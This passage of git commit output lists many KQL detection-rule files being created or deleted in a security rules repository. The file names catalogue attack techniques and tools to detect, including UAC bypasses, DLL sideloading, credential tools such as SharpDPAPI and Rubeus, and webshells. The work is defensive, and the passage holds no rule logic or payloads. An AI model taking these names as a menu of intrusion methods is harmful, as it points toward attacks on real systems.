KQL/rules/Persistence/suspicious_process_execution_from_fake_recycle_bin_folder.kql create mode 100644 KQL/rules/Persistence/suspicious_registry_modification_from_ads_via_regini_exe.kql create mode 100644 KQL/rules/Persistence/suspicious_screensave_change_by_reg_exe.kql create mode 100644 KQL/rules/Persistence/suspicious_service_path_modification.kql create mode 100644 KQL/rules/Persistence/suspicious_vboxdrvinst_exe_parameters.kql create mode 100644 KQL/rules/Persistence/terminal_server_client_connection_history_cleared_registry.kql create mode 100644 KQL/rules/Persistence/trust_access_disable_for_vbapplications.kql create mode 100644 KQL/rules/Persistence/trusted_path_bypass_via_windows_directory_spoofing.kql create mode 100644 KQL/rules/Persistence/uac_bypass_with_fake_dll.kql create mode 100644 KQL/rules/Persistence/uefi_persistence_via_wpbbin_filecreation.kql create mode 100644 KQL/rules/Persistence/uefi_persistence_via_wpbbin_processcreation.kql create mode 100644 KQL/rules/Persistence/uncommon_extension_shim_database_installation_via_sdbinst_exe.kql create mode 100644 KQL/rules/Persistence/uncommon_microsoft_office_trusted_location_added.kql create mode 100644 KQL/rules/Persistence/unsigned_appx_installation_attempt_using_add_appxpackage.kql create mode 100644 KQL/rules/Persistence/unusual_child_process_of_dns_exe.kql create mode 100644 KQL/rules/Persistence/unusual_file_deletion_by_dns_exe.kql create mode 100644 KQL/rules/Persistence/unusual_file_modification_by_dns_exe.kql create mode 100644 KQL/rules/Persistence/user_added_to_admin_group_via_dscl.kql create mode 100644 KQL/rules/Persistence/user_added_to_admin_group_via_dseditgroup.kql create mode 100644 KQL/rules/Persistence/user_added_to_admin_group_via_sysadminctl.kql create mode 100644 KQL/rules/Persistence/vscode_powershell_profile_modification.kql create mode 100644 KQL/rules/Persistence/wdigest_credguard_registry_modification.kql create mode 100644 KQL/rules/Persistence/wdigest_enable_uselogoncredential.kql create mode 100644 KQL/rules/Persistence/webshell_detection_with_command_line_keywords.kql create mode 100644 KQL/rules/Persistence/webshell_hacking_activity_patterns.kql create mode 100644 KQL/rules/Persistence/webshell_tool_reconnaissance_activity.kql create mode 100644 KQL/rules/Persistence/winlogon_allowmultipletssessions_enable.kql create mode 100644 KQL/rules/Persistence/wmi_persistence_script_event_consumer.kql create mode 100644 KQL/rules/Persistence/wmi_persistence_security.kql create mode 100644 KQL/rules/Privilege Escalation/add_port_monitor_persistence_in_registry.kql create mode 100644 KQL/rules/Privilege Escalation/allow_service_access_using_security_descriptor_tampering_via_sc_exe.kql create mode 100644 KQL/rules/Privilege Escalation/atbroker_registry_change.kql create mode 100644 KQL/rules/Privilege Escalation/bypass_uac_using_delegateexecute.kql create mode 100644 KQL/rules/Privilege Escalation/bypass_uac_using_event_viewer.kql create mode 100644 KQL/rules/Privilege Escalation/bypass_uac_using_silentcleanup_task.kql create mode 100644 KQL/rules/Privilege Escalation/bypass_uac_via_cmstp.kql create mode 100644 KQL/rules/Privilege Escalation/bypass_uac_via_wsreset_exe.kql create mode 100644 KQL/rules/Privilege Escalation/change_default_file_association_to_executable_via_assoc.kql create mode 100644 KQL/rules/Privilege Escalation/change_default_file_association_via_assoc.kql create mode 100644 KQL/rules/Privilege Escalation/changing_existing_service_imagepath_value_via_reg_exe.kql create mode 100644 KQL/rules/Privilege Escalation/classes_autorun_keys_modification.kql create mode 100644 KQL/rules/Privilege Escalation/com_hijacking_via_treatas.kql create mode 100644 KQL/rules/Privilege Escalation/com_object_hijacking_via_modification_of_default_system_clsid_default_value.kql create mode 100644 KQL/rules/Privilege Escalation/common_autorun_keys_modification.kql create mode 100644 KQL/rules/Privilege Escalation/control_panel_items.kql create mode 100644 KQL/rules/Privilege Escalation/created_files_by_microsoft_sync_center.kql create mode 100644 KQL/rules/Privilege Escalation/creation_exe_for_service_with_unquoted_path.kql create mode 100644 KQL/rules/Privilege Escalation/creation_of_werfault_exe_wer_dll_in_unusual_folder.kql create mode 100644 KQL/rules/Privilege Escalation/currentcontrolset_autorun_keys_modification.kql create mode 100644 KQL/rules/Privilege Escalation/currentversion_autorun_keys_modification.kql create mode 100644 KQL/rules/Privilege Escalation/currentversion_nt_autorun_keys_modification.kql create mode 100644 KQL/rules/Privilege Escalation/default_rdp_port_changed_to_non_standard_port.kql create mode 100644 KQL/rules/Privilege Escalation/deny_service_access_using_security_descriptor_tampering_via_sc_exe.kql create mode 100644 KQL/rules/Privilege Escalation/dhcp_callout_dll_installation.kql create mode 100644 KQL/rules/Privilege Escalation/direct_autorun_keys_modification.kql create mode 100644 KQL/rules/Privilege Escalation/dll_execution_via_register_cimprovider_exe.kql create mode 100644 KQL/rules/Privilege Escalation/dll_load_via_lsass.kql create mode 100644 KQL/rules/Privilege Escalation/dll_sideloading_by_vmware_xfer_utility.kql create mode 100644 KQL/rules/Privilege Escalation/dllhost_exe_execution_anomaly.kql create mode 100644 KQL/rules/Privilege Escalation/explorer_nouaccheck_flag.kql create mode 100644 KQL/rules/Privilege Escalation/fax_service_dll_search_order_hijack.kql create mode 100644 KQL/rules/Privilege Escalation/file_creation_in_suspicious_directory_by_msdt_exe.kql create mode 100644 KQL/rules/Privilege Escalation/guest_account_enabled_via_sysadminctl.kql create mode 100644 KQL/rules/Privilege Escalation/hacktool_crackmapexec_execution_patterns.kql create mode 100644 KQL/rules/Privilege Escalation/hacktool_dinjector_powershell_cradle_execution.kql create mode 100644 KQL/rules/Privilege Escalation/hacktool_hollowreaper_execution.kql create mode 100644 KQL/rules/Privilege Escalation/hacktool_impersonate_execution.kql create mode 100644 KQL/rules/Privilege Escalation/hacktool_sharpdpapi_execution.kql create mode 100644 KQL/rules/Privilege Escalation/hacktool_sharpersist_execution.kql create mode 100644 KQL/rules/Privilege Escalation/hacktool_sharpimpersonation_execution.kql create mode 100644 KQL/rules/Privilege Escalation/hacktool_winpeas_execution.kql create mode 100644 KQL/rules/Privilege Escalation/hktl_sharpsuccessor_privilege_escalation_tool_execution.kql create mode 100644 KQL/rules/Privilege Escalation/internet_explorer_autorun_keys_modification.kql create mode 100644 KQL/rules/Privilege Escalation/launch_agent_daemon_execution_via_launchctl.kql create mode 100644 KQL/rules/Privilege Escalation/linux_sudo_chroot_execution.kql create mode 100644 KQL/rules/Privilege Escalation/microsoft_sync_center_suspicious_network_connections.kql create mode 100644 KQL/rules/Privilege Escalation/narrator_s_feedback_hub_persistence.kql create mode 100644 KQL/rules/Privilege Escalation/network_connection_initiated_via_notepad_exe.kql create mode 100644 KQL/rules/Privilege Escalation/new_activescripteventconsumer_created_via_wmic_exe.kql create mode 100644 KQL/rules/Privilege Escalation/new_custom_shim_database_created.kql create mode 100644 KQL/rules/Privilege Escalation/new_dns_serverlevelplugindll_installed.kql create mode 100644 KQL/rules/Privilege Escalation/new_dns_serverlevelplugindll_installed_via_dnscmd_exe.kql create mode 100644 KQL/rules/Privilege Escalation/new_netsh_helper_dll_registered_from_a_suspicious_location.kql create mode 100644 KQL/rules/Privilege Escalation/new_outlook_macro_created.kql create mode 100644 KQL/rules/Privilege Escalation/new_run_key_pointing_to_suspicious_folder.kql create mode 100644 KQL/rules/Privilege Escalation/office_autorun_keys_modification.kql create mode 100644 KQL/rules/Privilege Escalation/outlook_macro_execution_without_warning_setting_enabled.kql create mode 100644 KQL/rules/Privilege Escalation/password_set_to_never_expire_via_wmi.kql create mode 100644 KQL/rules/Privilege Escalation/persistence_via_cron_files.kql create mode 100644 KQL/rules/Privilege Escalation/persistence_via_sudoers_files.kql create mode 100644 KQL/rules/Privilege Escalation/potential_com_object_hijacking_via_treatas_subkey_registry.kql create mode 100644 KQL/rules/Privilege Escalation/potential_dll_injection_or_execution_using_tracker_exe.kql create mode 100644 KQL/rules/Privilege Escalation/potential_dll_sideloading_of_dbgmodel_dll.kql create mode 100644 KQL/rules/Privilege Escalation/potential_dll_sideloading_of_mpsvc_dll.kql create mode 100644 KQL/rules/Privilege Escalation/potential_dll_sideloading_of_mscorsvc_dll.kql create mode 100644 KQL/rules/Privilege Escalation/potential_dll_sideloading_using_coregen_exe.kql create mode 100644 KQL/rules/Privilege Escalation/potential_dll_sideloading_via_deviceenroller_exe.kql create mode 100644 KQL/rules/Privilege Escalation/potential_dll_sideloading_via_vmware_xfer.kql create mode 100644 KQL/rules/Privilege Escalation/potential_initial_access_via_dll_search_order_hijacking.kql create mode 100644 KQL/rules/Privilege Escalation/potential_linux_process_code_injection_via_dd_utility.kql create mode 100644 KQL/rules/Privilege Escalation/potential_mpclient_dll_sideloading.kql create mode 100644 KQL/rules/Privilege Escalation/potential_mpclient_dll_sideloading_via_defender_binaries.kql create mode 100644 KQL/rules/Privilege Escalation/potential_persistence_attempt_via_existing_service_tampering.kql create mode 100644 KQL/rules/Privilege Escalation/potential_persistence_attempt_via_run_keys_using_reg_exe.kql create mode 100644 KQL/rules/Privilege Escalation/potential_persistence_using_debugpath.kql create mode 100644 KQL/rules/Privilege Escalation/potential_persistence_via_app_paths_default_property.kql create mode 100644 KQL/rules/Privilege Escalation/potential_persistence_via_appcompat_registerapprestart_layer.kql create mode 100644 KQL/rules/Privilege Escalation/potential_persistence_via_globalflags.kql create mode 100644 KQL/rules/Privilege Escalation/potential_persistence_via_logon_scripts_commandline.kql create mode 100644 KQL/rules/Privilege Escalation/potential_persistence_via_logon_scripts_registry.kql create mode 100644 KQL/rules/Privilege Escalation/potential_persistence_via_microsoft_compatibility_appraiser.kql create mode 100644 KQL/rules/Privilege Escalation/potential_persistence_via_netsh_helper_dll.kql create mode 100644 KQL/rules/Privilege Escalation/potential_persistence_via_netsh_helper_dll_registry.kql create mode 100644 KQL/rules/Privilege Escalation/potential_persistence_via_outlook_loadmacroprovideronboot_setting.kql create mode 100644 KQL/rules/Privilege Escalation/potential_persistence_via_plistbuddy.kql create mode 100644 KQL/rules/Privilege Escalation/potential_persistence_via_powershell_search_order_hijacking_task.kql create mode 100644 KQL/rules/Privilege Escalation/potential_persistence_via_scrobj_dll_com_hijacking.kql create mode 100644 KQL/rules/Privilege Escalation/potential_persistence_via_shim_database_in_uncommon_location.kql create mode 100644 KQL/rules/Privilege Escalation/potential_persistence_via_shim_database_modification.kql create mode 100644 KQL/rules/Privilege Escalation/potential_privilege_escalation_using_symlink_between_osk_and_cmd.kql create mode 100644 KQL/rules/Privilege Escalation/potential_process_injection_via_msra_exe.kql create mode 100644 KQL/rules/Privilege Escalation/potential_psfactorybuffer_com_hijacking.kql create mode 100644 KQL/rules/Privilege Escalation/potential_registry_persistence_attempt_via_dbgmanageddebugger.kql create mode 100644 KQL/rules/Privilege Escalation/potential_registry_persistence_attempt_via_windows_telemetry.kql create mode 100644 KQL/rules/Privilege Escalation/potential_ripzip_attack_on_startup_folder.kql create mode 100644 KQL/rules/Privilege Escalation/potential_ssh_tunnel_persistence_install_using_a_scheduled_task.kql create mode 100644 KQL/rules/Privilege Escalation/potential_startup_shortcut_persistence_via_powershell_exe.kql create mode 100644 KQL/rules/Privilege Escalation/potential_uac_bypass_via_sdclt_exe.kql create mode 100644 KQL/rules/Privilege Escalation/powershell_web_access_feature_enabled_via_dism.kql create mode 100644 KQL/rules/Privilege Escalation/registry_persistence_via_explorer_run_key.kql create mode 100644 KQL/rules/Privilege Escalation/regsvr32_dll_execution_with_uncommon_extension.kql create mode 100644 KQL/rules/Privilege Escalation/renamed_vmnat_exe_execution.kql create mode 100644 KQL/rules/Privilege Escalation/root_account_enable_via_dsenableroot.kql create mode 100644 KQL/rules/Privilege Escalation/rundll32_registered_com_objects.kql create mode 100644 KQL/rules/Privilege Escalation/schedule_task_creation_from_env_variable_or_potentially_suspicious_path_via_schtasks_exe.kql create mode 100644 KQL/rules/Privilege Escalation/scheduled_task_creation_masquerading_as_system_processes.kql create mode 100644 KQL/rules/Privilege Escalation/scheduled_task_creation_with_curl_and_powershell_execution_combo.kql create mode 100644 KQL/rules/Privilege Escalation/scheduled_task_executing_encoded_payload_from_registry.kql create mode 100644 KQL/rules/Privilege Escalation/scheduled_task_executing_payload_from_registry.kql create mode 100644 KQL/rules/Privilege Escalation/scheduled_task_job_at.kql create mode 100644 KQL/rules/Privilege Escalation/scheduled_taskcache_change_by_uncommon_program.kql create mode 100644 KQL/rules/Privilege Escalation/schtasks_creation_or_modification_with_system_privileges.kql create mode 100644 KQL/rules/Privilege Escalation/schtasks_from_suspicious_folders.kql create mode 100644 KQL/rules/Privilege Escalation/security_privileges_enumeration_via_whoami_exe.kql create mode 100644 KQL/rules/Privilege Escalation/security_support_provider_ssp_added_to_lsa_configuration.kql create mode 100644 KQL/rules/Privilege Escalation/session_manager_autorun_keys_modification.kql create mode 100644 KQL/rules/Privilege Escalation/setup16_exe_execution_with_custom_lst_file.kql create mode 100644 KQL/rules/Privilege Escalation/startup_folder_file_write.kql create mode 100644 KQL/rules/Privilege Escalation/sticky_key_like_backdoor_execution.kql create mode 100644 KQL/rules/Privilege Escalation/sticky_key_like_backdoor_usage_registry.kql create mode 100644 KQL/rules/Privilege Escalation/suspicious_autorun_registry_modified_via_wmi.kql create mode 100644 KQL/rules/Privilege Escalation/suspicious_command_patterns_in_scheduled_task_creation.kql create mode 100644 KQL/rules/Privilege Escalation/suspicious_desktop_ini_action.kql create mode 100644 KQL/rules/Privilege Escalation/suspicious_driver_install_by_pnputil_exe.kql create mode 100644 KQL/rules/Privilege Escalation/suspicious_get_variable_exe_creation.kql create mode 100644 KQL/rules/Privilege Escalation/suspicious_grpconv_execution.kql create mode 100644 KQL/rules/Privilege Escalation/suspicious_gup_usage.kql create mode 100644 KQL/rules/Privilege Escalation/suspicious_modification_of_scheduled_tasks.kql create mode 100644 KQL/rules/Privilege Escalation/suspicious_ntlm_authentication_on_the_printer_spooler_service.kql create mode 100644 KQL/rules/Privilege Escalation/suspicious_outlook_macro_created.kql create mode 100644 KQL/rules/Privilege Escalation/suspicious_powershell_in_registry_run_keys.kql create mode 100644 KQL/rules/Privilege Escalation/suspicious_run_key_from_download.kql create mode 100644 KQL/rules/Privilege Escalation/suspicious_runas_like_flag_combination.kql create mode 100644 KQL/rules/Privilege Escalation/suspicious_rundll32_invoking_inline_vbscript.kql create mode 100644 KQL/rules/Privilege Escalation/suspicious_scheduled_task_creation_involving_temp_folder.kql create mode 100644 KQL/rules/Privilege Escalation/suspicious_scheduled_task_creation_via_masqueraded_xml_file.kql create mode 100644 KQL/rules/Privilege Escalation/suspicious_scheduled_task_name_as_guid.kql create mode 100644 KQL/rules/Privilege Escalation/suspicious_scheduled_task_write_to_system32_tasks.kql create mode 100644 KQL/rules/Privilege Escalation/suspicious_schtasks_execution_appdata_folder.kql create mode 100644 KQL/rules/Privilege Escalation/suspicious_schtasks_schedule_type_with_high_privileges.kql create mode 100644 KQL/rules/Privilege Escalation/suspicious_schtasks_schedule_types.kql create mode 100644 KQL/rules/Privilege Escalation/suspicious_screensaver_binary_file_creation.kql create mode 100644 KQL/rules/Privilege Escalation/suspicious_service_dacl_modification_via_set_service_cmdlet.kql create mode 100644 KQL/rules/Privilege Escalation/suspicious_shim_database_patching_activity.kql create mode 100644 KQL/rules/Privilege Escalation/suspicious_startup_folder_persistence.kql create mode 100644 KQL/rules/Privilege Escalation/suspicious_userinit_child_process.kql create mode 100644 KQL/rules/Privilege Escalation/sysinternals_psservice_execution.kql create mode 100644 KQL/rules/Privilege Escalation/sysinternals_pssuspend_execution.kql create mode 100644 KQL/rules/Privilege Escalation/system_scripts_autorun_keys_modification.kql create mode 100644 KQL/rules/Privilege Escalation/tasks_folder_evasion.kql create mode 100644 KQL/rules/Privilege Escalation/triple_cross_ebpf_rootkit_default_persistence.kql create mode 100644 KQL/rules/Privilege Escalation/trustedpath_uac_bypass_pattern.kql create mode 100644 KQL/rules/Privilege Escalation/uac_disabled.kql create mode 100644 KQL/rules/Privilege Escalation/uac_notification_disabled.kql create mode 100644 KQL/rules/Privilege Escalation/uac_secure_desktop_prompt_disabled.kql create mode 100644 KQL/rules/Privilege Escalation/uncommon_userinit_child_process.kql create mode 100644 KQL/rules/Privilege Escalation/user_added_to_highly_privileged_group.kql create mode 100644 KQL/rules/Privilege Escalation/user_added_to_local_administrators_group.kql create mode 100644 KQL/rules/Privilege Escalation/user_added_to_root_sudoers_group_using_usermod.kql create mode 100644 KQL/rules/Privilege Escalation/using_settingsynchost_exe_as_lolbin.kql create mode 100644 KQL/rules/Privilege Escalation/vbscript_payload_stored_in_registry.kql create mode 100644 KQL/rules/Privilege Escalation/whoami_exe_execution_from_privileged_process.kql create mode 100644 KQL/rules/Privilege Escalation/windows_event_log_access_tampering_via_registry.kql create mode 100644 KQL/rules/Privilege Escalation/windows_terminal_profile_settings_modification_by_uncommon_process.kql create mode 100644 KQL/rules/Privilege Escalation/winekey_registry_modification.kql create mode 100644 KQL/rules/Privilege Escalation/winlogon_notify_key_logon_persistence.kql create mode 100644 KQL/rules/Privilege Escalation/winrar_creating_files_in_startup_locations.kql create mode 100644 KQL/rules/Privilege Escalation/winsock2_autorun_keys_modification.kql create mode 100644 KQL/rules/Privilege Escalation/wmi_backdoor_exchange_transport_agent.kql create mode 100644 KQL/rules/Privilege Escalation/wmi_persistence_command_line_event_consumer.kql create mode 100644 KQL/rules/Privilege Escalation/wmi_persistence_script_event_consumer_file_write.kql create mode 100644 KQL/rules/Privilege Escalation/wow6432node_classes_autorun_keys_modification.kql create mode 100644 KQL/rules/Privilege Escalation/wow6432node_currentversion_autorun_keys_modification.kql create mode 100644 KQL/rules/Privilege Escalation/wow6432node_windows_nt_currentversion_autorun_keys_modification.kql create mode 100644 KQL/rules/Privilege Escalation/writing_local_admin_share.kql create mode 100644 KQL/rules/Privilege Escalation/xwizard_exe_execution_from_non_default_location.kql create mode 100644 KQL/rules/Reconnaissance/access_of_sudoers_file_content.kql create mode 100644 KQL/rules/Reconnaissance/linux_recon_indicators.kql create mode 100644 KQL/rules/Reconnaissance/potential_active_directory_enumeration_using_ad_module_proccreation.kql create mode 100644 KQL/rules/Reconnaissance/print_history_file_contents.kql create mode 100644 KQL/rules/Reconnaissance/pua_pingcastle_execution.kql create mode 100644 KQL/rules/Reconnaissance/pua_pingcastle_execution_from_potentially_suspicious_parent.kql create mode 100644 KQL/rules/Reconnaissance/suspicious_git_clone.kql create mode 100644 KQL/rules/Reconnaissance/suspicious_git_clone_linux.kql create mode 100644 KQL/rules/Resource Development/creation_of_a_diagcab.kql create mode 100644 KQL/rules/Resource Development/hacktool_purplesharp_execution.kql create mode 100644 KQL/rules/Resource Development/hybridconnectionmanager_service_installation_registry.kql create mode 100644 KQL/rules/Resource Development/potential_execution_of_sysinternals_tools.kql create mode 100644 KQL/rules/Resource Development/potential_privilege_escalation_to_local_system.kql create mode 100644 KQL/rules/Resource Development/potential_psexec_remote_execution.kql create mode 100644 KQL/rules/Resource Development/psexec_paexec_escalation_to_local_system.kql create mode 100644 KQL/rules/Resource Development/pua_csexec_execution.kql create mode 100644 KQL/rules/Resource Development/pua_sysinternal_tool_execution_registry.kql create mode 100644 KQL/rules/Resource Development/pua_sysinternals_tools_execution_registry.kql create mode 100644 KQL/rules/Resource Development/renamed_sysinternals_debugview_execution.kql create mode 100644 KQL/rules/Resource Development/suspicious_execution_of_renamed_sysinternals_tools_registry.kql create mode 100644 KQL/rules/Resource Development/suspicious_keyboard_layout_load.kql create mode 100644 KQL/rules/Resource Development/uncommon_file_created_in_office_startup_folder.kql create mode 100644 KQL/rules/Resource Development/usage_of_renamed_sysinternals_tools_registryset.kql create mode 100644 KQL/rules/Resource Development/vhd_image_download_via_browser.kql delete mode 100644 Lateral Movement/Copy_From_Or_To_Admin_Share_Or_Sysvol_Folder.kql delete mode 100644 Lateral Movement/HackTool_-_KrbRelayUp_Execution.kql delete mode 100644 Lateral Movement/HackTool_-_Potential_Impacket_Lateral_Movement_Activity.kql delete mode 100644 Lateral Movement/HackTool_-_Rubeus_Execution.kql delete mode 100644 Lateral Movement/HackTool_-_SharpMove_Tool_Execution.kql delete mode 100644 Lateral Movement/HackTool_-_WinRM_Access_Via_Evil-WinRM.kql delete mode 100644 Lateral Movement/HackTool_-_Wmiexec_Default_Powershell_Command.kql delete mode 100644 Lateral Movement/MMC_Spawning_Windows_Shell.kql delete mode 100644 Lateral Movement/Mstsc.EXE_Execution_From_Uncommon_Parent.kql delete mode 100644 Lateral Movement/New_PortProxy_Registry_Entry_Added.kql delete mode 100644 Lateral Movement/New_Port_Forwarding_Rule_Added_Via_Netsh.EXE.kql delete mode 100644 Lateral Movement/New_Remote_Desktop_Connection_Initiated_Via_Mstsc.EXE.kql delete mode 100644 Lateral Movement/Outbound_RDP_Connections_Over_Non-Standard_Tools.kql delete mode 100644 Lateral Movement/PDQ_Deploy_Remote_Adminstartion_Tool_Execution.kql delete mode 100644 Lateral Movement/PSEXEC_Remote_Execution_File_Artefact.kql delete mode 100644 Lateral Movement/PUA_-_Radmin_Viewer_Utility_Execution.kql delete mode 100644 Lateral Movement/Password_Provided_In_Command_Line_Of_Net.EXE.kql delete mode 100644 Lateral Movement/Port_Forwarding_Activity_Via_SSH.EXE.kql delete mode 100644 Lateral Movement/Potential_CobaltStrike_Service_Installations_-_Registry.kql delete mode 100644 Lateral Movement/Potential_DCOM_InternetExplorer.Application_DLL_Hijack.kql delete mode 100644 Lateral Movement/Potential_DCOM_InternetExplorer.Application_DLL_Hijack_-_Image_Load.kql delete mode 100644 Lateral Movement/Potential_Excel.EXE_DCOM_Lateral_Movement_Via_ActivateMicrosoftApp.kql delete mode 100644 Lateral Movement/Potential_MSTSC_Shadowing_Activity.kql delete mode 100644 Lateral Movement/Potential_Persistence_Via_Logon_Scripts_-_Registry.kql delete mode 100644 Lateral Movement/Potential_Remote_Desktop_Tunneling.kql delete mode 100644 Lateral Movement/Potential_Tampering_With_RDP_Related_Registry_Keys_Via_Reg.EXE.kql delete mode 100644 Lateral Movement/Privilege_Escalation_via_Named_Pipe_Impersonation.kql delete mode 100644 Lateral Movement/RDP_Over_Reverse_SSH_Tunnel.kql delete mode 100644 Lateral Movement/RDP_Port_Forwarding_Rule_Added_Via_Netsh.EXE.kql delete mode 100644 Lateral Movement/Rundll32_Execution_Without_Parameters.kql delete mode 100644 Lateral Movement/Suspicious_Plink_Port_Forwarding.kql delete mode 100644 Lateral Movement/Suspicious_RDP_Redirect_Using_TSCON.kql delete mode 100644 Lateral Movement/Suspicious_SysAidServer_Child.kql delete mode 100644 Lateral Movement/Suspicious_UltraVNC_Execution.kql delete mode 100644 Lateral Movement/Suspicious_WSMAN_Provider_Image_Loads.kql delete mode 100644 Lateral Movement/Terminal_Service_Process_Spawn.kql delete mode 100644 Lateral Movement/Uncommon_Outbound_Kerberos_Connection.kql delete mode 100644 Lateral Movement/User_Added_to_Remote_Desktop_Users_Group.kql delete mode 100644 Lateral Movement/WMI_ActiveScriptEventConsumers_Activity_Via_Scrcons.EXE_DLL_Load.kql delete mode 100644 Lateral Movement/Windows_Admin_Share_Mount_Via_Net.EXE.kql delete mode 100644 Lateral Movement/Windows_Internet_Hosted_WebDav_Share_Mount_Via_Net.EXE.kql delete mode 100644 Lateral Movement/Windows_Share_Mount_Via_Net.EXE.kql delete mode 100644 Lateral Movement/Wmiexec_Default_Output_File.kql delete mode 100644 Lateral Movement/Wmiprvse_Wbemcomn_DLL_Hijack.kql delete mode 100644 Lateral Movement/Wmiprvse_Wbemcomn_DLL_Hijack_-_File.kql delete mode 100644 Lateral Movement/Writing_Local_Admin_Share.kql delete mode 100644 Persistence/Abuse_of_Service_Permissions_to_Hide_Services_Via_Set-Service.kql delete mode 100644 Persistence/Add_Debugger_Entry_To_AeDebug_For_Persistence.kql delete mode 100644 Persistence/Add_Debugger_Entry_To_Hangs_Key_For_Persistence.kql delete mode 100644 Persistence/Add_Port_Monitor_Persistence_in_Registry.kql delete mode 100644 Persistence/Allow_Service_Access_Using_Security_Descriptor_Tampering_Via_Sc.EXE.kql delete mode 100644 Persistence/Aruba_Network_Service_Potential_DLL_Sideloading.kql delete mode 100644 Persistence/Atbroker_Registry_Change.kql delete mode 100644 Persistence/Bypass_UAC_Using_Event_Viewer.kql delete mode 100644 Persistence/COM_Hijacking_via_TreatAs.kql delete mode 100644 Persistence/Change_Default_File_Association_To_Executable_Via_Assoc.kql delete mode 100644 Persistence/Change_Default_File_Association_Via_Assoc.kql delete mode 100644 Persistence/Changing_Existing_Service_ImagePath_Value_Via_Reg.EXE.kql delete mode 100644 Persistence/Chopper_Webshell_Process_Pattern.kql delete mode 100644 Persistence/Chromium_Browser_Instance_Executed_With_Custom_Extension.kql delete mode 100644 Persistence/Classes_Autorun_Keys_Modification.kql delete mode 100644 Persistence/Common_Autorun_Keys_Modification.kql delete mode 100644 Persistence/Control_Panel_Items.kql delete mode 100644 Persistence/Creation_Exe_for_Service_with_Unquoted_Path.kql delete mode 100644 Persistence/Creation_Of_Non-Existent_System_DLL.kql delete mode 100644 Persistence/Creation_of_a_Local_Hidden_User_Account_by_Registry.kql delete mode 100644 Persistence/Creation_of_an_WerFault.exe_in_Unusual_Folder.kql delete mode 100644 Persistence/CurrentControlSet_Autorun_Keys_Modification.kql delete mode 100644 Persistence/CurrentVersion_Autorun_Keys_Modification.kql delete mode 100644 Persistence/CurrentVersion_NT_Autorun_Keys_Modification.kql delete mode 100644 Persistence/DLL_Load_via_LSASS.kql delete mode 100644 Persistence/DLL_Search_Order_Hijackig_Via_Additional_Space_in_Path.kql delete mode 100644 Persistence/DLL_Sideloading_Of_ShellChromeAPI.DLL.kql delete mode 100644 Persistence/Default_RDP_Port_Changed_to_Non_Standard_Port.kql delete mode 100644 Persistence/Deny_Service_Access_Using_Security_Descriptor_Tampering_Via_Sc.EXE.kql delete mode 100644 Persistence/Direct_Autorun_Keys_Modification.kql delete mode 100644 Persistence/Enable_Local_Manifest_Installation_With_Winget.kql delete mode 100644 Persistence/Enabling_COR_Profiler_Environment_Variables.kql delete mode 100644 Persistence/Fax_Service_DLL_Search_Order_Hijack.kql delete mode 100644 Persistence/File_Creation_In_Suspicious_Directory_By_Msdt.EXE.kql delete mode 100644 Persistence/File_Download_Via_Bitsadmin.kql delete mode 100644 Persistence/File_Download_Via_Bitsadmin_To_A_Suspicious_Target_Folder.kql delete mode 100644 Persistence/File_Download_Via_Bitsadmin_To_An_Uncommon_Target_Folder.kql delete mode 100644 Persistence/File_With_Suspicious_Extension_Downloaded_Via_Bitsadmin.kql delete mode 100644 Persistence/HackTool_-_CrackMapExec_Execution.kql delete mode 100644 Persistence/HackTool_-_SharPersist_Execution.kql delete mode 100644 Persistence/IE_Change_Domain_Zone.kql delete mode 100644 Persistence/IIS_Native-Code_Module_Command_Line_Installation.kql delete mode 100644 Persistence/Internet_Explorer_Autorun_Keys_Modification.kql delete mode 100644 Persistence/Leviathan_Registry_Key_Activity.kql delete mode 100644 Persistence/MSExchange_Transport_Agent_Installation.kql delete mode 100644 Persistence/Malicious_DLL_File_Dropped_in_the_Teams_or_OneDrive_Folder.kql delete mode 100644 Persistence/Microsoft_Office_DLL_Sideload.kql delete mode 100644 Persistence/Modify_User_Shell_Folders_Startup_Value.kql delete mode 100644 Persistence/Narrator_s_Feedback-Hub_Persistence.kql delete mode 100644 Persistence/New_ActiveScriptEventConsumer_Created_Via_Wmic.EXE.kql delete mode 100644 Persistence/New_Custom_Shim_Database_Created.kql delete mode 100644 Persistence/New_Kernel_Driver_Via_SC.EXE.kql delete mode 100644 Persistence/New_Netsh_Helper_DLL_Registered_From_A_Suspicious_Location.kql delete mode 100644 Persistence/New_ODBC_Driver_Registered.kql delete mode 100644 Persistence/New_Outlook_Macro_Created.kql delete mode 100644 Persistence/New_RUN_Key_Pointing_to_Suspicious_Folder.kql delete mode 100644 Persistence/New_Service_Creation_Using_PowerShell.kql delete mode 100644 Persistence/New_Service_Creation_Using_Sc.EXE.kql delete mode 100644 Persistence/New_TimeProviders_Registered_With_Uncommon_DLL_Name.kql delete mode 100644 Persistence/New_User_Created_Via_Net.EXE.kql delete mode 100644 Persistence/New_User_Created_Via_Net.EXE_With_Never_Expire_Option.kql delete mode 100644 Persistence/Office_Application_Startup_-_Office_Test.kql delete mode 100644 Persistence/Office_Autorun_Keys_Modification.kql delete mode 100644 Persistence/OilRig_APT_Registry_Persistence.kql delete mode 100644 Persistence/Outlook_Macro_Execution_Without_Warning_Setting_Enabled.kql delete mode 100644 Persistence/Outlook_Security_Settings_Updated_-_Registry.kql delete mode 100644 Persistence/PSEXEC_Remote_Execution_File_Artefact.kql delete mode 100644 Persistence/Password_Provided_In_Command_Line_Of_Net.EXE.kql delete mode 100644 Persistence/Path_To_Screensaver_Binary_Modified.kql delete mode 100644 Persistence/Persistence_Via_Disk_Cleanup_Handler_-_Autorun.kql delete mode 100644 Persistence/Persistence_Via_Hhctrl.ocx.kql delete mode 100644 Persistence/Persistence_Via_New_SIP_Provider.kql delete mode 100644 Persistence/Persistence_Via_TypedPaths_-_CommandLine.kql delete mode 100644 Persistence/Possible_Privilege_Escalation_via_Weak_Service_Permissions.kql delete mode 100644 Persistence/Potential_7za.DLL_Sideloading.kql delete mode 100644 Persistence/Potential_Amazon_SSM_Agent_Hijacking.kql delete mode 100644 Persistence/Potential_Antivirus_Software_DLL_Sideloading.kql delete mode 100644 Persistence/Potential_Binary_Or_Script_Dropper_Via_PowerShell.kql delete mode 100644 Persistence/Potential_CCleanerDU.DLL_Sideloading.kql delete mode 100644 Persistence/Potential_CCleanerReactivator.DLL_Sideloading.kql delete mode 100644 Persistence/Potential_COM_Object_Hijacking_Via_TreatAs_Subkey_-_Registry.kql delete mode 100644 Persistence/Potential_Chrome_Frame_Helper_DLL_Sideloading.kql delete mode 100644 Persistence/Potential_DLL_Sideloading_Of_DBGCORE.DLL.kql delete mode 100644 Persistence/Potential_DLL_Sideloading_Of_DBGHELP.DLL.kql delete mode 100644 